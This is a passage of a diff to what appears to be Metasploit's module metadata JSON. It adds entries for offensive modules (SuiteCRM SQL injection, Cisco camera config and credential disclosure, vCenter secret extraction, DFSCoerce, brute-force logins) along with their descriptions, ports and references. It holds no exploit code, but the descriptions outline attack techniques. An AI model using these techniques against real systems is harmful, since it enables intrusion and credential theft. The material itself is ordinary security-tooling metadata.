+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "config-changes",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/dcerpc/icpr_cert": {
+    "name": "ICPR Certificate Management",
+    "fullname": "auxiliary/admin/dcerpc/icpr_cert",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Oliver Lyak",
+      "Spencer McIntyre"
+    ],
+    "description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n          template's configuration the resulting certificate can be used for various operations such as authentication.\n          PFX certificate files that are saved are encrypted with a blank password.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-08-25 08:49:52 +0000",
+    "path": "/modules/auxiliary/admin/dcerpc/icpr_cert.rb",
+    "is_install_path": true,
+    "ref_name": "admin/dcerpc/icpr_cert",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+
+      ],
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/dcerpc/samr_computer": {
+    "name": "SAMR Computer Management",
+    "fullname": "auxiliary/admin/dcerpc/samr_computer",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "JaGoTu",
+      "Spencer McIntyre"
+    ],
+    "description": "Add, lookup and delete computer accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain. Administrative privileges however are required to delete the\n          created accounts.",
+    "references": [
+      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-06-28 11:53:05 +0000",
+    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
+    "is_install_path": true,
+    "ref_name": "admin/dcerpc/samr_computer",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+
+      ],
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
      ]
    },
    "session_types": false,
@@ -4468,8 +4626,7 @@
    ],
    "description": "This module exploits an unauthenticated arbitrary wordpress options change vulnerability\n          in the Automatic (wp-automatic) plugin <= 3.53.2. If WPEMAIL is provided, the administrator's email\n          address will be changed. User registration is\n          enabled, and default user role is set to administrator. A user is then created with\n          the USER name set. A valid EMAIL is required to get the registration email (not handled in MSF).",
    "references": [
-      "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/",
-      "NOCVE-Patched in 3.53.3 without vendor disclosure"
+      "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -4490,7 +4647,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-11-04 15:28:05 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_automatic_plugin_privesc",
@@ -4507,6 +4664,9 @@
      "SideEffects": [
        "config-changes",
        "ioc-in-logs"
+      ],
+      "NOCVE": [
+        "Patched in 3.53.3 without vendor disclosure"
      ]
    },
    "session_types": false,
@@ -4649,7 +4809,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_gdpr_compliance_privesc",
@@ -4657,6 +4817,12 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
      "SideEffects": [
        "config-changes"
      ]
@@ -8854,6 +9020,53 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/vmware/vcenter_offline_mdb_extract": {
+    "name": "VMware vCenter Extract Secrets from vmdir / vmafd DB File",
+    "fullname": "auxiliary/admin/vmware/vcenter_offline_mdb_extract",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-05-10",
+    "type": "auxiliary",
+    "author": [
+      "npm <npm@cesium137.io>"
+    ],
+    "description": "Grab certificates from the vCenter server vmdird and vmafd\n          database files and adds them to loot. The vmdird MDB database file\n          can be found on the live appliance under the path\n          /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path\n          /storage/db/vmware-vmafd/afd.db. The vmdir database contains the\n          IdP signing credential, and vmafd contains the vCenter certificate\n          store. This module will accept either file from a live vCenter\n          appliance, or from a vCenter appliance backup archive; either or\n          both files can be supplied.",
+    "references": [
+      "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-05-26 11:52:56 +0000",
+    "path": "/modules/auxiliary/admin/vmware/vcenter_offline_mdb_extract.rb",
+    "is_install_path": true,
+    "ref_name": "admin/vmware/vcenter_offline_mdb_extract",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/vnc/realvnc_41_bypass": {
    "name": "RealVNC NULL Authentication Mode Bypass",
    "fullname": "auxiliary/admin/vnc/realvnc_41_bypass",
@@ -16681,7 +16894,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-11-11 11:37:55 +0000",
+    "mod_time": "2022-05-06 00:22:52 +0000",
    "path": "/modules/auxiliary/gather/billquick_txtid_sqli.rb",
    "is_install_path": true,
    "ref_name": "gather/billquick_txtid_sqli",
@@ -16839,11 +17052,13 @@
    "disclosure_date": null,
    "type": "auxiliary",
    "author": [
-      "Nixawk"
+      "Nixawk",
+      "e2002e",
+      "Christophe De La Fuente"
    ],
-    "description": "The module use the Censys REST API to access the same data\n        accessible through web interface. The search endpoint allows searches\n        against the current data in the IPv4, Top Million Websites, and\n        Certificates indexes using the same search syntax as the primary site.",
+    "description": "The module uses the Censys REST API to access the same data accessible\n          through the web interface. The search endpoint allows queries using\n          the Censys Search Language against the Hosts dataset. Setting the\n          CERTIFICATES option will also retrieve the certificate details for each\n          relevant service by querying the Certificates dataset.",
    "references": [
-      "URL-https://censys.io/api"
+      "URL-https://search.censys.io"
    ],
    "platform": "",
    "arch": "",
@@ -16855,7 +17070,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-01-28 10:35:25 +0000",
+    "mod_time": "2022-07-04 17:19:16 +0000",
    "path": "/modules/auxiliary/gather/censys_search.rb",
    "is_install_path": true,
    "ref_name": "gather/censys_search",
@@ -16863,6 +17078,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -17002,6 +17226,65 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/cisco_pvc2300_download_config": {
+    "name": "Cisco PVC2300 POE Video Camera configuration download",
+    "fullname": "auxiliary/gather/cisco_pvc2300_download_config",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2013-07-12",
+    "type": "auxiliary",
+    "author": [
+      "Craig Heffner",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits an information disclosure vulnerability in Cisco PVC2300 cameras in order\n            to download the configuration file containing the admin credentials for the web interface.\n\n            The module first performs a basic check to see if the target is likely Cisco PVC2300. If so, the\n            module attempts to obtain a sessionID via an HTTP GET request to the vulnerable /oamp/System.xml\n            endpoint using hardcoded credentials.\n\n            If a session ID is obtained, the module uses it in another HTTP GET request to /oamp/System.xml\n            with the aim of downloading the configuration file. The configuration file, if obtained, is then\n            decoded and saved to the loot directory. Finally, the module attempts to extract the admin\n            credentials to the web interface from the decoded configuration file.\n\n            No known solution was made available for this vulnerability and no CVE has been published. It is\n            therefore likely that most (if not all) Cisco PVC2300 cameras are affected.\n\n            This module was successfully tested against several Cisco PVC2300 cameras.",
+    "references": [
+      "URL-https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf",
+      "URL-https://media.blackhat.com/us-13/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf",
+      "URL-https://www.youtube.com/watch?v=B8DjTcANBx0"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-08-04 11:45:36 +0000",
+    "path": "/modules/auxiliary/gather/cisco_pvc2300_download_config.rb",
+    "is_install_path": true,
+    "ref_name": "gather/cisco_pvc2300_download_config",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/cisco_rv320_config": {
    "name": "Cisco RV320/RV326 Configuration Disclosure",
    "fullname": "auxiliary/gather/cisco_rv320_config",
@@ -17142,7 +17425,8 @@
    "disclosure_date": null,
    "type": "auxiliary",
    "author": [
-      "mekhalleh (RAMELLA Sébastien)"
+      "mekhalleh (RAMELLA Sébastien)",
+      "Yvain"
    ],
    "description": "This module can be useful if you need to test the security of your server and your\n          website behind a solution Cloud based. By discovering the origin IP address of the\n          targeted host.\n\n          More precisely, this module uses multiple data sources (in order ViewDNS.info, DNS enumeration\n          and Censys) to collect assigned (or have been assigned) IP addresses from the targeted site or domain\n          that uses the following:\n          * Cloudflare, Amazon CloudFront, ArvanCloud, Envoy Proxy, Fastly, Stackpath Fireblade,\n          Stackpath MaxCDN, Imperva Incapsula, InGen Security (BinarySec EasyWAF), KeyCDN, Microsoft AzureCDN,\n          Netlify and Sucuri.",
    "references": [
@@ -17158,7 +17442,7 @@
      "dns"
    ],
    "targets": null,
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2022-06-23 17:27:47 +0000",
    "path": "/modules/auxiliary/gather/cloud_lookup.rb",
    "is_install_path": true,
    "ref_name": "gather/cloud_lookup",
@@ -18715,7 +18999,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-05-16 12:03:24 +0000",
+    "mod_time": "2022-06-08 11:53:42 +0000",
    "path": "/modules/auxiliary/gather/impersonate_ssl.rb",
    "is_install_path": true,
    "ref_name": "gather/impersonate_ssl",
@@ -19260,6 +19544,133 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/ldap_query": {
+    "name": "LDAP Query and Enumeration Module",
+    "fullname": "auxiliary/gather/ldap_query",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-05-19",
+    "type": "auxiliary",
+    "author": [
+      "Grant Willcox"
+    ],
+    "description": "This module allows users to query an LDAP server using either a custom LDAP query, or\n          a set of LDAP queries under a specific category. Users can also specify a JSON or YAML\n          file containing custom queries to be executed using the RUN_QUERY_FILE action.\n          If this action is specified, then QUERY_FILE_PATH must be a path to the location\n          of this JSON/YAML file on disk.\n\n          Users can also run a single query by using the RUN_SINGLE_QUERY option and then setting\n          the QUERY_FILTER datastore option to the filter to send to the LDAP server and QUERY_ATTRIBUTES\n          to a comma seperated string containing the list of attributes they are interested in obtaining\n          from the results.\n\n          As a third option can run one of several predefined queries by setting ACTION to the\n          appropriate value. These options will be loaded from the ldap_queries_default.yaml file\n          located in the MSF configuration directory, located by default at ~/.msf4/ldap_queries_default.yaml.\n\n          All results will be returned to the user in table, CSV or JSON format, depending on the value\n          of the OUTPUT_FORMAT datastore option. The characters || will be used as a delimiter\n          should multiple items exist within a single column.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-08-30 16:59:30 +0000",
+    "path": "/modules/auxiliary/gather/ldap_query.rb",
+    "is_install_path": true,
+    "ref_name": "gather/ldap_query",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_gather/manageengine_adaudit_plus_xnode_enum": {
+    "name": "ManageEngine ADAudit Plus Xnode Enumeration",
+    "fullname": "auxiliary/gather/manageengine_adaudit_plus_xnode_enum",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Sahil Dhar",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits default admin credentials for the DataEngine\n        Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in\n        order to dump the contents of Xnode data repositories (tables),\n        which may contain (a limited amount of) Active Directory\n        information including domain names, host names, usernames and SIDs.\n        This module can also be used against patched ADAudit Plus versions\n        if the correct credentials are provided.\n\n        By default, this module dumps only the data repositories and fields\n        (columns) specified in the configuration file (set via the\n        CONFIG_FILE option). The configuration file is also used to\n        add labels to the values sent by Xnode in response to a query.\n\n        It is also possible to use the DUMP_ALL option to obtain all data\n        in all known data repositories without specifying data field names.\n        However, note that when using the DUMP_ALL option, the data won't be labeled.\n\n        This module has been successfully tested against ManageEngine\n        ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2 and\n        ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.",
+    "references": [
+      "CVE-2020-11532",
+      "PACKETSTORM-157609"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 29118,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-08-24 16:15:11 +0000",
+    "path": "/modules/auxiliary/gather/manageengine_adaudit_plus_xnode_enum.rb",
+    "is_install_path": true,
+    "ref_name": "gather/manageengine_adaudit_plus_xnode_enum",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_gather/manageengine_datasecurity_plus_xnode_enum": {
+    "name": "ManageEngine DataSecurity Plus Xnode Enumeration",
+    "fullname": "auxiliary/gather/manageengine_datasecurity_plus_xnode_enum",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Sahil Dhar",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits default admin credentials for the DataEngine\n        Xnode server in DataSecurity Plus versions prior to 6.0.1 (6011)\n        in order to dump the contents of Xnode data repositories (tables),\n        which may contain (a limited amount of) Active Directory\n        information including domain names, host names, usernames and SIDs.\n        This module can also be used against patched DataSecurity Plus\n        versions if the correct credentials are provided.\n\n        By default, this module dumps only the data repositories and fields\n        (columns) specified in the configuration file (set via the\n        CONFIG_FILE option). The configuration file is also used to\n        add labels to the values sent by Xnode in response to a query.\n\n        It is also possible to use the DUMP_ALL option to obtain all data\n        in all known data repositories without specifying data field names.\n        However, note that when using the DUMP_ALL option, the data won't be labeled.\n\n        This module has been successfully tested against ManageEngine\n        DataSecurity Plus 6.0.1 (6010) running on Windows Server 2012 R2.",
+    "references": [
+      "CVE-2020-11532",
+      "PACKETSTORM-157609"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 29119,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-08-24 16:15:11 +0000",
+    "path": "/modules/auxiliary/gather/manageengine_datasecurity_plus_xnode_enum.rb",
+    "is_install_path": true,
+    "ref_name": "gather/manageengine_datasecurity_plus_xnode_enum",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/mantisbt_admin_sqli": {
    "name": "MantisBT Admin SQL Injection Arbitrary File Read",
    "fullname": "auxiliary/gather/mantisbt_admin_sqli",
@@ -19384,7 +19795,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2022-06-22 19:44:53 +0000",
    "path": "/modules/auxiliary/gather/memcached_extractor.rb",
    "is_install_path": true,
    "ref_name": "gather/memcached_extractor",
@@ -20878,6 +21289,65 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/suite_crm_export_sqli": {
+    "name": "SuiteCRM authenticated SQL injection in export functionality",
+    "fullname": "auxiliary/gather/suite_crm_export_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-05-24",
+    "type": "auxiliary",
+    "author": [
+      "Exodus Intelligence",
+      "jheysel-r7",
+      "Redouane NIBOUCHA <rniboucha@yahoo.fr>"
+    ],
+    "description": "This module exploits an authenticated SQL injection in SuiteCRM in versions before 7.12.6. The vulnerability\n          allows an authenticated attacker to send specially crafted requests to the export entry point of the application in order\n          to retrieve all the usernames and their associated password from the database.",
+    "references": [
+      "URL-https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/",
+      "URL-https://docs.suitecrm.com/admin/releases/7.12.x/#_7_12_6"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-09-12 23:46:10 +0000",
+    "path": "/modules/auxiliary/gather/suite_crm_export_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "gather/suite_crm_export_sqli",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/teamtalk_creds": {
    "name": "TeamTalk Gather Credentials",
    "fullname": "auxiliary/gather/teamtalk_creds",
@@ -22144,6 +22614,48 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/dcerpc/dfscoerce": {
+    "name": "DFSCoerce",
+    "fullname": "auxiliary/scanner/dcerpc/dfscoerce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Wh04m1001",
+      "xct_de",
+      "Spencer McIntyre"
+    ],
+    "description": "Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.",
+    "references": [
+      "URL-https://github.com/Wh04m1001/DFSCoerce"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-06-30 17:38:30 +0000",
+    "path": "/modules/auxiliary/scanner/dcerpc/dfscoerce.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/dcerpc/dfscoerce",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/dcerpc/endpoint_mapper": {
    "name": "Endpoint Mapper Service Discovery",
    "fullname": "auxiliary/scanner/dcerpc/endpoint_mapper",
@@ -22289,7 +22801,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-01-31 13:50:19 +0000",
+    "mod_time": "2022-06-30 15:12:23 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/petitpotam.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/petitpotam",
@@ -22594,7 +23106,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-05-24 19:01:36 +0000",
+    "mod_time": "2022-07-08 09:56:51 +0000",
    "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/ipv6_neighbor",
@@ -25007,6 +25519,64 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/cassandra_web_file_read": {
+    "name": "Cassandra Web File Read Vulnerability",
+    "fullname": "auxiliary/scanner/http/cassandra_web_file_read",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Jeremy Brown",
+      "krastanoel"
+    ],
+    "description": "This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web\n          'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.\n          This vulnerability occured due to the disabled Rack::Protection module",
+    "references": [
+      "URL-https://github.com/avalanche123/cassandra-web/commit/f11e47a26f316827f631d7bcfec14b9dd94f44be",
+      "EDB-49362"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 3000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-08-03 19:21:42 +0000",
+    "path": "/modules/auxiliary/scanner/http/cassandra_web_file_read.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/cassandra_web_file_read",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/cert": {
    "name": "HTTP SSL Certificate Checker",
    "fullname": "auxiliary/scanner/http/cert",
@@ -25236,9 +25806,9 @@
    "session_types": false,
    "needs_cleanup": false
  },
-  "auxiliary_scanner/http/cisco_asa_asdm": {
-    "name": "Cisco ASA ASDM Bruteforce Login Utility",
-    "fullname": "auxiliary/scanner/http/cisco_asa_asdm",
+  "auxiliary_scanner/http/cisco_asa_asdm_bruteforce": {
+    "name": "Cisco ASA ASDM Brute-force Login",
+    "fullname": "auxiliary/scanner/http/cisco_asa_asdm_bruteforce",
    "aliases": [

    ],
@@ -25246,11 +25816,11 @@
    "disclosure_date": null,
    "type": "auxiliary",
    "author": [
-      "Jonathan Claudius <jclaudius@trustwave.com>"
+      "jbaines-r7"
    ],
-    "description": "This module scans for Cisco ASA ASDM web login portals and\n        performs login brute force to identify valid credentials.",
+    "description": "This module scans for the Cisco ASA ASDM landing page and performs login brute-force\n          to identify valid credentials.",
    "references": [
-
+      "URL-https://www.cisco.com/c/en/us/products/security/adaptive-security-device-manager/index.html"
    ],
    "platform": "",
    "arch": "",
@@ -25271,14 +25841,80 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-01-28 10:35:25 +0000",
-    "path": "/modules/auxiliary/scanner/http/cisco_asa_asdm.rb",
+    "mod_time": "2022-08-16 06:31:25 +0000",
+    "path": "/modules/auxiliary/scanner/http/cisco_asa_asdm_bruteforce.rb",
    "is_install_path": true,
-    "ref_name": "scanner/http/cisco_asa_asdm",
+    "ref_name": "scanner/http/cisco_asa_asdm_bruteforce",
    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_scanner/http/cisco_asa_clientless_vpn": {
+    "name": "Cisco ASA Clientless SSL VPN (WebVPN) Brute-force Login Utility",
+    "fullname": "auxiliary/scanner/http/cisco_asa_clientless_vpn",
+    "aliases": [
+      "auxiliary/scanner/http/cisco_asa_asdm"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Jonathan Claudius <jclaudius@trustwave.com>",
+      "jbaines-r7"
+    ],
+    "description": "This module scans for Cisco ASA Clientless SSL VPN (WebVPN) web login portals and\n          performs login brute-force to identify valid credentials.",
+    "references": [
+      "URL-https://www.cisco.com/c/en/us/support/docs/security-vpn/webvpn-ssl-vpn/119417-config-asa-00.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-08-19 10:51:33 +0000",
+    "path": "/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/cisco_asa_clientless_vpn",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -26103,7 +26739,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-03-16 14:24:45 +0000",
+    "mod_time": "2022-06-15 11:35:30 +0000",
    "path": "/modules/auxiliary/scanner/http/crawler.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/crawler",
@@ -38211,6 +38847,53 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/misc/freeswitch_event_socket_login": {
+    "name": "FreeSWITCH Event Socket Login",
+    "fullname": "auxiliary/scanner/misc/freeswitch_event_socket_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "krastanoel"
+    ],
+    "description": "This module tests FreeSWITCH Event Socket logins on a range of\n          machines and report successful attempts.",
+    "references": [
+      "URL-https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8021,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-07-01 12:22:31 +0000",
+    "path": "/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/misc/freeswitch_event_socket_login",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-restarts"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/misc/ib_service_mgr_info": {
    "name": "Borland InterBase Services Manager Information",
    "fullname": "auxiliary/scanner/misc/ib_service_mgr_info",
@@ -39835,7 +40518,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-05-30 13:03:03 +0000",
    "path": "/modules/auxiliary/scanner/nfs/nfsmount.rb",
    "is_install_path": true,
    "ref_name": "scanner/nfs/nfsmount",
@@ -44138,6 +44821,53 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/scada/bacnet_l3": {
+    "name": "BACnet Scanner",
+    "fullname": "auxiliary/scanner/scada/bacnet_l3",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Paz <Paz @ SCADAfence>"
+    ],
+    "description": "Discover BACnet devices by broadcasting Who-is message, then poll\n        discovered devices for properties including model name,\n        software version, firmware revision and description.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-08-01 15:11:57 +0000",
+    "path": "/modules/auxiliary/scanner/scada/bacnet_l3.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/scada/bacnet_l3",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "SideEffects": [
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/scada/digi_addp_reboot": {
    "name": "Digi ADDP Remote Reboot Initiator",
    "fullname": "auxiliary/scanner/scada/digi_addp_reboot",
@@ -47122,7 +47852,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-07-19 16:04:41 +0000",
    "path": "/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb",
    "is_install_path": true,
